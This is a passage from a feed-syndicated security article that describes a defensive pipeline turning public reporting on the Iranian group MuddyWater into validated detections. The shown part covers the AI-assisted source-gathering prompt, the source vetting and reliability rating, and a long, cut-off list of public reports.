href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana]]></title>
<description><![CDATA[11 validated detections from public sources, OpenCTI graph, and a one-command labTable of ContentsMost threat actor writeups stop too early. They describe the group, list ATT&CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: what do I actually do with th...]]></description>
<link>https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>11 validated detections from public sources, OpenCTI graph, and a one-command lab</em>Table of Contents</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HvRb4_s15JQ6FkA9ng-8w.png"></figure><p>Most threat actor writeups stop too early. They describe the group, list ATT&amp;CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: <em>what do I actually do with this on Monday?</em></p><p>Operation Desert Hydra is an answer to that question.</p><p>This article documents a full CTI-to-detection pipeline focused on <strong>MuddyWater</strong> — an Iranian state-linked actor (MOIS) that has been targeting Israeli government, defense, and critical infrastructure organizations since at least 2019. By the end, you’ll have 11 detection records, 12 Kibana proof screenshots, and a working lab you can deploy with a single command.</p><p>Everything is on my GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra">github.com/anpa1200/operation-desert-hydra</a></p><p><a href="https://github.com/anpa1200/operation-desert-hydra">GitHub - anpa1200/operation-desert-hydra: OpenCTI-based CTI-to-Detection Knowledge Graph for Iranian activity against Israeli organizations</a></p><ol><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#86dc"><strong>Why MuddyWater?</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#aadd"><strong>The Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c6f3"><strong>Phase 1: Source Gathering</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#205e"><strong>Phase 2: Procedure Dataset</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#fb48"><strong>Phase 3: OpenCTI Knowledge Graph</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c2e1"><strong>Phase 4: Detection Atlas</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8ce1"><strong>Phase 5: Validation Lab</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#0a42"><strong>Validation Results Summary</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8cf4"><strong>Phase 6: Coverage Matrix</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dfaa"><strong>What Defenders Should Do Right Now</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#b8cc"><strong>Reproduce It Yourself</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dbb0"><strong>Production Scars</strong></a></li></ol><h3>Why MuddyWater?</h3><p>Three reasons:</p><ol><li><strong>Rich public reporting.</strong> CISA, Israel’s INCD, ClearSky, Deep Instinct, Mandiant, and Proofpoint have all published detailed technical analysis. This gives enough procedure-level specificity to engineer real detections.</li><li><strong>Consistent playbook.</strong> Across five years of reporting, the same pattern recurs: spearphishing → scripting engine → encoded PowerShell → RMM tool. The consistency makes it detectable.</li><li><strong>Relevant geography.</strong> The actor consistently targets Israeli organizations — a geography with high analytical value and underserved public detection coverage.</li></ol><h3>The Pipeline</h3><p>The project enforces a chain from source to Kibana screenshot:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NDsnhzE7S-lzy0fSIOZrsw.png"></figure><pre>source → claim → procedure → ATT&amp;CK mapping → telemetry requirement<br>  → detection pseudologic → benign simulation → lab result → coverage score</pre><p>No step is skipped. Every claim has a source. Every detection has a validation case. Every PASS has a screenshot.</p><h3>Phase 1: Source Gathering</h3><p>The first step is source discovery, not detection writing.</p><h4>Traditional Source Gathering — and Why It’s Not Enough Alone</h4><p>The standard workflow for CTI source gathering looks like this: run keyword searches (Google, Google Dorks, site: operators for known vendor blogs), check your Threat Intelligence Platform for existing reports on the actor, subscribe to vendor RSS feeds, pull ISAC/ISAO advisories, and query your organization’s TIP for any existing indicator sets or finished intelligence reports tagged to the actor.</p><p>For a mature, well-documented actor like MuddyWater this gets you to maybe 15–20 well-known sources quickly — the CISA advisory, the MITRE ATT&amp;CK page, two or three vendor blog posts you already knew about. The problem is coverage holes: you’ll reliably find sources that are already in your network’s vocabulary and miss the ones that aren’t. A CERT-IL PDF published in Hebrew and linked only from a government portal, a Group-IB campaign teardown behind a partial paywall, or a 2020 ClearSky report that predates your current TIP subscription window — all of these can fall out of a manual search pass.</p><p>TIPs compound this in a specific way: they surface what has already been ingested and tagged. If a source was never promoted into your TIP (because it was published before the subscription started, or because no analyst had time to import it), it is invisible inside the platform. The TIP is authoritative for what it knows, not for the universe of available sources.</p><h4>AI research</h4><p>The parallel AI research pass was not a replacement for traditional gathering — it was a coverage supplement. After both approaches ran, the traditional pass and the AI outputs were merged into the same deduplication step. The AI outputs added approximately 40 sources beyond what a manual search surfaced; traditional search added discipline about sources the models hallucinated (fabricated URLs, mis-attributed PDFs). Neither was sufficient alone.</p><p>I ran parallel deep-research passes using Gemini and OpenAI, both given the same prompt. Each returned a candidate source register. Both outputs were compared, deduplicated (71 candidates → 8 promoted), and the surviving sources were manually acquired and reviewed before anything entered the dataset.</p><h4>The Actual Prompt</h4><p>This is the exact prompt used — both models received it verbatim:</p><pre>You are a senior CTI researcher and source-validation analyst. For Operation Desert Hydra,<br>gather the best public sources on MuddyWater / Seedworm / Mango Sandstorm / TA450 and<br>related Iranian activity against Israeli organizations. Goal: create a source register for<br>an OpenCTI-based CTI-to-detection knowledge graph:<br>Source → Actor → Campaign → Procedure → ATT&amp;CK Technique → Observable → Log Source<br>→ Detection → Validation → Coverage.<br>Search MITRE ATT&amp;CK, CISA/FBI/NSA, Israel National Cyber Directorate, Microsoft,<br>Google/Mandiant, ESET, Check Point, ClearSky, Unit 42, Proofpoint, SentinelOne,<br>Recorded Future, Symantec, Talos, Trend Micro, Kaspersky, Cloudflare/Hunt.io/DomainTools,<br>GitHub, and academic sources.<br>Include secondary comparison actors only as comparison: APT34, APT35/Charming Kitten/Mint<br>Sandstorm, CyberAv3ngers, Agrius. Do not merge actors unless a source explicitly supports<br>overlap.<br>For every source, return this YAML structure:<br>  id, title, publisher, url, direct_download_url, download_type, publication_date,<br>  access_date, actor_claims, source_type, reliability, relevance flags for<br>  actor_profile/procedures/malware/infrastructure/detections/validation_lab/opencti_modeling,<br>  key_entities, key_attck_techniques, source_summary, use_for_project, limitations.<br>Provide direct PDF/STIX/JSON/CSV/GitHub raw links where available; if unavailable write<br>direct_download_url: none_found. Do not invent URLs or dates.<br>Use evidence labels:<br>  Observed = directly shown in telemetry/sample/log/screenshot/source artifact<br>  Reported = stated by source<br>  Assessed = source judgment<br>  Inferred = analyst conclusion from multiple cited facts<br>  Gap = unknown or not proven<br>Do not upgrade source claims, do not treat ATT&amp;CK mapping as attribution evidence, do not<br>treat shared tooling as actor identity proof, and do not claim detection coverage without<br>validation.<br>Search exact terms including:<br>  MuddyWater Iran MOIS, MuddyWater Seedworm, MuddyWater Mango Sandstorm,<br>  MuddyWater TA450, MuddyWater POWERSTATS, PowGoop, MuddyViper, MuddyWater Israel,<br>  Israeli organizations, PowerShell, RMM, phishing, spearphishing, Exchange CVE-2020-0688,<br>  CVE-2017-0199, MITRE ATT&amp;CK, CISA FBI NSA advisory, Mango Sandstorm Microsoft,<br>  TA450 Proofpoint, Seedworm Symantec, ESET, ClearSky, Unit 42, Check Point, Mandiant,<br>  SentinelOne, Recorded Future, Talos, Trend Micro, Kaspersky;<br>  also: APT34 Israel, APT35 Israel, Mint Sandstorm Israel, CyberAv3ngers Israel,<br>  Agrius Israel, Iranian threat actors Israeli organizations.<br>Output only these sections:<br>  1) Executive Source Assessment<br>  2) High-Priority Source Register with 10-20 best sources in YAML<br>  3) Extended Source Register<br>  4) Direct Downloads Table<br>  5) Actor Alias / Overlap Notes<br>  6) Procedure Extraction Candidates grouped by tactic with source_ids, evidence_label,<br>     ATT&amp;CK candidate, required telemetry, detection opportunity, validation_possible<br>  7) OpenCTI Modeling Candidates<br>  8) Detection Engineering Opportunities marked candidate only<br>  9) Gaps And Manual Review Items<br>The final output must be usable to seed data/sources.yaml, data/procedures.yaml,<br>docs methodology, OpenCTI import plan, and detection atlas.</pre><h4>What the Prompt Is Designed to Do</h4><p>A few decisions worth explaining:</p><p><strong>Output schema in the prompt.</strong> Asking for a specific YAML field list (id, title, publisher, url, direct_download_url…) forces the model to either produce usable data or leave a visible blank — no vague summaries. direct_download_url: none_found is the required answer when a URL doesn't exist, which prevents the model from inventing one.</p><p><strong>Evidence labels baked in.</strong> The five labels (Observed / Reported / Assessed / Inferred / Gap) are defined in the prompt so the model applies them consistently and the output is ready to feed directly into data/procedures.yaml without reformatting.</p><p><strong>Explicit anti-hallucination rules.</strong> “Do not invent URLs or dates.” “Do not upgrade source claims.” “Do not treat ATT&amp;CK mapping as attribution evidence.” These are not just principles — they are instructions the model can fail visibly on, which makes QA faster.</p><p><strong>Parallel models, same prompt.</strong> Running Gemini and OpenAI on the same prompt and comparing outputs catches source fabrications: if one model lists a URL the other doesn’t, that URL gets verified before it enters the register. Two models that agree independently on a source add confidence; one model alone that lists something unusual is a flag.</p><h4>The Review Gate</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p--8CFcThnLuDmZiNyOdQg.png"></figure><p>Every source that came out of the AI output went through this checklist before being promoted into data/sources.yaml:</p><ul><li>Is the URL real and accessible?</li><li>Is the publication date accurate?</li><li>Does the content actually describe MuddyWater procedures (not just mention the name)?</li><li>Is there at least one procedure-level claim (not just “actor uses PowerShell”)?</li><li>Is the actor identification explicit or inferred from shared tooling only?</li></ul><p>71 candidates → 8 government/vendor sources promoted. The rest were duplicates, secondary summaries, or sources that named the actor without procedure-level specificity.</p><h4>Research Artifacts (All in the Repo)</h4><p>Every file from the source gathering workflow is version-controlled and publicly accessible:</p><ul><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/Gemini-research.md"><strong>Gemini-research.md</strong></a> — Raw Gemini deep-research output: candidate source register in YAML, procedure extraction candidates, OpenCTI modeling candidates, detection opportunities, gaps.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/openAI-research.md"><strong>openAI-research.md</strong></a> — Raw OpenAI deep-research output: executive assessment, high-priority sources, extended source register, direct download list, actor alias notes.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/relevant-research-list.md"><strong>relevant-research-list.md</strong></a> — Deduplicated candidate list after comparing both model outputs: 71 sources, acquisition targets for Step 5.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-acquisition-report.md"><strong>source-acquisition-report.md</strong></a> — Results of the automated fetch run: HTTP status, content type, file size, and extraction status for all 71 sources.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-reliability-evidence-assessment.md"><strong>source-reliability-evidence-assessment.md</strong></a> — Analyst review notes: reliability ratings, evidence quality, promotion decisions, and limitations per source.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/tree/main/docs/source-gathering/raw-sources"><strong>raw-sources/</strong></a> — 71 numbered source folders, each containing metadata.json, headers.txt, the raw source file, extracted source.txt, and fallback reader output.</li></ul><h4><strong>Promoted sources (highest weight):</strong></h4><ul><li><strong>CISA AA22–055A (Feb 2022)</strong> — Full procedure survey: PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin; WMI survey script; credential dumping tools.</li><li><strong>INCD 2023</strong> — Israeli campaign specifics: ScreenConnect/SimpleHelp RMM abuse, Egnyte/OneDrive lures, Log4j + Exchange exploitation.</li><li><strong>INCD 2024</strong> — BugSleep analysis: 43-minute scheduled task beacon, VPN exploitation, new RMM tools (Level, PDQConnect).</li></ul><p>Supporting vendor sources: ClearSky, Deep Instinct, Group-IB, Mandiant, Proofpoint, Sekoia.io, Symantec.</p><h4>Why These Three Have the Highest Weight</h4><p>The reliability assessment used a two-axis rubric: <strong>Source Reliability (A–F)</strong> separating publication discipline from content, and <strong>Information Credibility (1–6)</strong> rating how well each claim is grounded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*672ETgk4DFDJDE0G2-sLgA.png"></figure><p><strong>CISA AA22–055A — Reliability A, Credibility 2</strong></p><p>This is a joint advisory signed by five national authorities: CISA, FBI, CNMF, NCSC-UK, and NSA. That multi-agency co-signature is not ceremonial — each agency must independently agree to the technical content before it publishes. The advisory names specific malware families (PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin), includes an actual WMI PowerShell survey script attributed to MuddyWater, and lists credential-dumping tool names. Evidence label: Reported / Assessed. The PDF acquired locally at raw-sources/07-u-s-cyber-command-defense-media-aa22-055a-pdf-mirror/source.pdf is the authoritative copy distributed via Defense Media Activity. Credibility is 2, not 1, because the advisory states TTPs based on intelligence assessment rather than a single intercepted artifact — but the authority behind that assessment is as high as public-source CTI gets.</p><p><strong>INCD 2023 (MuddyWater / DarkBit PDF) — Reliability A, Credibility 2</strong></p><p>The Israel National Cyber Directorate is the government authority responsible for civilian cyber defense in Israel, the primary target country for this actor. This report covers a specific Israeli campaign including: tool names (ScreenConnect, SimpleHelp), file-sharing lure services (Egnyte, OneDrive), exploitation of Log4j and Exchange CVE-2020–0688, and deployment of ransomware (DarkBit) as a cover operation. Evidence label: Observed / Reported / Assessed. The "Observed" label means the INCD had direct visibility into the incident — not a secondary summary. This gives procedure-level specificity that generic vendor threat intel doesn't reach. Acquired at raw-sources/17-israel-national-cyber-directorate-muddywater-darkbit-pdf/source.pdf.</p><p><strong>INCD 2024 (BugSleep PDF) — Reliability A, Credibility 2</strong></p><p>Same publisher authority as INCD 2023, focused on MuddyWater’s 2024 evolution. Key content: BugSleep backdoor analysis, the specific 43-minute scheduled task beacon interval (which became proc_mw_0006 and det_mw_0006), VPN exploitation, and new RMM tools (Level, PDQConnect). The 43-minute interval is a concrete behavioral fingerprint — not a general TTP category — and it came from direct INCD analysis. Evidence label: Observed / Reported / Assessed. Acquired at raw-sources/18-israel-national-cyber-directorate-technological-advancement-and-evolution-of-muddywater-in/source.pdf.</p><p>The three sources share a common characteristic: they are not secondary aggregators or vendor marketing. They are government authorities with direct incident visibility reporting on specific Israeli campaigns.</p><h4>Steps After Deduplication: What Actually Happened to All 71 Sources</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XeokisYTU_DGw6UH7bLB3w.png"></figure><p>After the AI outputs were merged and deduplicated, 71 candidate sources remained. Here is what happened to them across Steps 5–9:</p><p><strong>Step 5 — Automated Acquisition</strong></p><p>tools/fetch_research_sources.py ran against all 71 URLs. For each source it created a numbered folder under docs/source-gathering/raw-sources/ with:</p><pre>raw-sources/<br>  01-mitre-att-ck-muddywater-g0069/<br>    metadata.json        # URL, fetch timestamp, HTTP status, content-type, size<br>    headers.txt          # Raw HTTP response headers<br>    source.html / source.pdf / source.txt   # Primary file<br>    source.txt           # Text extract (for PDFs and HTML)<br>    fallback-reader.txt  # Reader-mode fallback if primary was blocked or JS-rendered</pre><p>Not all fetches succeeded. Some sources returned 403 (vendor gating), some required JS rendering (only fallback text was captured), and two PDFs were corrupted. The acquisition report at docs/source-gathering/source-acquisition-report.md records the HTTP status, file size, and extraction status for all 71.</p><p><strong>Step 6 — Reliability and Credibility Rating</strong></p><p>Each acquired source was rated using the two-axis rubric. The full assessment table is in docs/source-gathering/source-reliability-evidence-assessment.md. Outcome breakdown:</p><ul><li>Reliability A (government / primary standard): 23 sources</li><li>Reliability B (usually reliable vendor / research publisher): 25 sources</li><li>Reliability C (secondary / news / marketing): 18 sources</li><li>Reliability F (failed acquisition or cannot judge): 5 sources</li></ul><p><strong>Step 7 — Promotion Decision</strong></p><p>Only sources with a combination of Reliability A or B, Credibility 2 or better, a usable acquisition, and at least one procedure-level claim were promoted into data/sources.yaml. The rest were assigned one of: Use as corroboration, Use as comparison only, Defer, or Exclude.</p><p>71 candidates → 8 primary sources promoted into the dataset. The 63 that were not promoted are retained in raw-sources/ for future work; they are not discarded.</p><p><strong>Step 8 — Claim Extraction</strong></p><p>For each promoted source, specific claims were extracted with source binding and evidence labels. A claim is not “MuddyWater uses PowerShell” — it is: “CISA AA22–055A (AA22–055A PDF, p.4) reports that MuddyWater actors deploy PowGoop, a DLL loader that decrypts and executes a PowerShell backdoor (Reported)." This source-bound format prevents claim drift downstream.</p><p><strong>Step 9 — Procedure Candidate Extraction</strong></p><p>From the bound claims, 10 procedure candidates were grouped by tactic: Initial Access, Execution, Persistence, Defense Evasion, Discovery, C2, Credential Access. Each candidate recorded: required telemetry, detection opportunity, whether lab validation was feasible, and whether the procedure appeared in multiple independent sources (a promotion signal for higher confidence scores later).</p><h4>The Full 71-Source Candidate List</h4><p>This is the deduplicated list produced after comparing Gemini and OpenAI outputs. Every source here was an acquisition target for Step 5.</p><p><strong>Core MuddyWater / Seedworm / TA450 / Mango Sandstorm</strong></p><ol><li><a href="https://attack.mitre.org/groups/G0069/">MITRE ATT&amp;CK — MuddyWater G0069</a></li><li><a href="https://attack.mitre.org/software/S0223/">MITRE ATT&amp;CK — POWERSTATS S0223</a></li><li><a href="https://attack.mitre.org/software/S1046/">MITRE ATT&amp;CK — PowGoop S1046</a></li><li><a href="https://www.cisa.gov/news-events/alerts/2022/02/24/iranian-government-sponsored-muddywater-actors-conducting-malicious">CISA alert — Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A advisory page</a></li><li><a href="https://www.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A PDF</a></li><li><a href="https://media.defense.gov/2022/Feb/24/2002944274/-1/-1/0/CSA_AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.PDF">U.S. Cyber Command / Defense media — AA22–055A PDF mirror</a></li><li><a href="https://www.ncsc.gov.uk/news/joint-advisory-observes-muddywater-actors-conducting-cyber-espionage">NCSC-UK — Joint advisory on MuddyWater actor</a></li><li><a href="https://www.iranwatch.org/sites/default/files/cybercom_muddywater_press_release.pdf">U.S. Cyber Command / Iran Watch mirror — Iranian intel cyber suite of malware PDF</a></li><li><a href="https://duo.com/decipher/us-cyber-command-discloses-muddywater-malware-samples">Decipher — US Cyber Command Discloses MuddyWater Malware Samples</a></li><li><a href="https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/">SentinelOne — Wading Through Muddy Waters</a></li><li><a href="https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/">Palo Alto Unit 42 — Muddying the Water: Targeted Attacks in the Middle East</a></li><li><a href="https://radar.certfa.com/en/insights/cluster/fe272810/">CERTFA Radar — MuddyWater Threat Actor Cluster</a></li><li><a href="https://radar.certfa.com/en/threats/view/d7c9c420/">CERTFA Radar — MuddyWater / Earth Vetala Intrusion</a></li><li><a href="https://www.group-ib.com/masked-actors/muddywater/">Group-IB — MuddyWater APT Group Profile</a></li></ol><p><strong>Israel-Focused MuddyWater Sources</strong></p><ol><li><a href="https://www.gov.il/en/pages/_muddywater">Israel National Cyber Directorate — MuddyWater page</a></li><li><a href="https://www.gov.il/BlobFolder/news/_muddywater/en/government%20threat%20actor.pdf">Israel National Cyber Directorate — MuddyWater / DarkBit PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf">Israel National Cyber Directorate — Technological Advancement and Evolution of MuddyWater in 2024 PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/alert_1947/he/ALERT-CERT-IL-W-1947.pdf">Israel National Cyber Directorate — Overview of Recent Phishing PDF</a></li><li><a href="https://www.clearskysec.com/operation-quicksand/">ClearSky — Operation Quicksand: MuddyWater’s Offensive Attack Against Israeli Organizations</a></li><li><a href="https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf">ClearSky — Operation Quicksand PDF</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/">Microsoft — MERCURY and DEV-1084: Destructive attack on hybrid environment</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/">Microsoft — Exposing POLONIUM activity and infrastructure targeting Israeli organizations</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign">Proofpoint — TA450 Uses Embedded Links in PDF Attachments in Latest Campaign</a></li><li><a href="https://harfanglab.io/insidethelab/muddywater-rmm-campaign/">HarfangLab — MuddyWater campaign abusing Atera Agents</a></li><li><a href="https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework">Deep Instinct — DarkBeatC2: The Latest MuddyWater Attack Framework</a></li><li><a href="https://www.scworld.com/brief/novel-c2-tool-leveraged-in-latest-muddywater-attacks">SC Media — Novel C2 tool leveraged in latest MuddyWater attacks</a></li><li><a href="https://blog.checkpoint.com/research/muddywater-threat-group-deploys-new-bugsleep-backdoor/">Check Point — MuddyWater Threat Group Deploys New BugSleep Backdoor</a></li><li><a href="https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/">ESET / WeLiveSecurity — MuddyWater: Snakes by the riverbank</a></li><li><a href="https://www.eset.com/uk/about/newsroom/press-releases/iran-muddywater-critical-infrastructure-israel-egypt-snake-game-eset-research-uk/">ESET press release — Iran’s MuddyWater targets critical infrastructure in Israel and Egypt</a></li><li><a href="https://securityaffairs.com/185244/apt/muddywater-strikes-israel-with-advanced-muddyviper-malware.html">Security Affairs — MuddyWater strikes Israel with advanced MuddyViper malware</a></li><li><a href="https://thehackernews.com/2024/03/iran-linked-muddywater-deploys-atera.html">The Hacker News — Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks</a></li></ol><p><strong>Recent / Evolving MuddyWater Activity</strong></p><ol><li><a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix">Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/crossed-wires-case-study-iranian-espionage-and-attribution">Proofpoint — Crossed Wires: a case study of Iranian espionage and attribution</a></li><li><a href="https://www.group-ib.com/blog/muddywater-operation-olalampo/">Group-IB — Operation Olalampo: Inside MuddyWater’s Latest Campaign</a></li><li><a href="https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html">The Hacker News — MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP</a></li><li><a href="https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/">Rapid7 — Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware</a></li><li><a href="https://thehackernews.com/2026/05/muddywater-uses-microsoft-teams-to.html">The Hacker News — MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack</a></li><li><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/">Rapid7 — Iran Conflict Cyber Threat Intelligence</a></li><li><a href="https://www.extrahop.com/blog/the-digital-front-of-iranian-cyber-offensive-and-defensive-response">ExtraHop — The Digital Front of Iranian Cyber Offensive and Defensive Response</a></li><li><a href="https://abnormal.ai/blog/iran-aligned-cyber-operations-email-threats">Abnormal Security — Tracking Iran-Aligned Cyber Operations Following U.S.-Israel Strikes</a></li><li><a href="https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/">Unit 42 — Boggy Serpens Threat Assessment</a></li><li><a href="https://hivepro.com/threat-advisory/muddywater-irans-adaptive-cyber-espionage-machine/">Hive Pro — MuddyWater: Iran’s Adaptive Cyber Espionage Machine</a></li><li><a href="https://hivepro.com/wp-content/uploads/2026/03/TA2026082.pdf">Hive Pro — MuddyWater / Operation Olalampo PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2024/10/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2024-en.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2024 PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2025/09/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2025-en-2.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2025 PDF</a></li><li><a href="https://documents.trendmicro.com/assets/pdf/Annual_APT_Report_2025.pdf">Trend Micro — Annual APT Report 2025 PDF</a></li><li><a href="https://go.intel471.com/hubfs/Emerging%20Threats/2025%20Emerging%20Threats/Upd%20HUNTER%20-%20Iranian%20Threat%20Actor%20Coverage.pdf">Intel 471 — HUNTER Iranian Threat Actor Coverage PDF</a></li></ol><p><strong>Iran Threat Context and Comparison Actors</strong></p><ol><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran">CISA — Iran Threat Overview and Advisories</a></li><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/iran/publications">CISA — Iran state-sponsored cyber threat publications</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">CISA — AA23–335A: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors</a></li><li><a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-335a-irgc-affiliated-cyber-actors-exploit-plcs-in-multiple-sectors-1.pdf">CISA — AA23–335A PDF</a></li><li><a href="https://attack.mitre.org/groups/G0049/">MITRE ATT&amp;CK — APT34</a></li><li><a href="https://attack.mitre.org/groups/G0059/">MITRE ATT&amp;CK — APT35 / Charming Kitten</a></li><li><a href="https://attack.mitre.org/groups/G1030/">MITRE ATT&amp;CK — Agrius</a></li><li><a href="https://www.microsoft.com/en-us/security/security-insider/mint-sandstorm">Microsoft — Mint Sandstorm</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/">Microsoft — Peach Sandstorm deploys new custom Tickler malware</a></li><li><a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide">Microsoft Learn — How Microsoft names threat actors</a></li><li><a href="https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/">SentinelOne — Iranian Cyber Activity Outlook</a></li><li><a href="https://mirror.gpmidi.net/vx-underground/Malware%20Analysis/2024/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability/Paper/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability.pdf">Trellix — The Iranian Cyber Capability PDF</a></li></ol><p><strong>OpenCTI / STIX / Knowledge Graph References</strong></p><ol><li><a href="https://docs.opencti.io/latest/usage/data-model/">OpenCTI documentation — Data model</a></li><li><a href="https://docs.opencti.io/latest/reference/api/">OpenCTI documentation — GraphQL API</a></li><li><a href="https://docs.opencti.io/latest/usage/deduplication/">OpenCTI documentation — Deduplication</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html">OASIS — STIX 2.1 HTML specification</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/cs02/stix-v2.1-cs02.pdf">OASIS — STIX 2.1 PDF specification</a></li><li><a href="https://stixproject.github.io/documentation/concepts/relationships/">STIX Project — Relationships</a></li><li><a href="https://arxiv.org/abs/2303.09999">STIXnet — Extracting STIX Objects in CTI Reports</a></li><li><a href="https://arxiv.org/abs/2507.16576">From Text to Actionable Intelligence: Automating STIX Entity and Relationship Extraction</a></li><li><a href="https://arxiv.org/abs/2605.15904">Context-aware Entity-Relation Extraction for Threat Intelligence Knowledge Graphs</a></li></ol><p><strong>Validate Before Promoting</strong></p><ol><li><a href="https://brandefense.io/wp-content/uploads/2025/10/brandefense.io-muddywater-iran-linked-espionage-group-expanding-global-reach-muddywater-.pdf">Brandefense — MuddyWater PDF</a></li><li><a 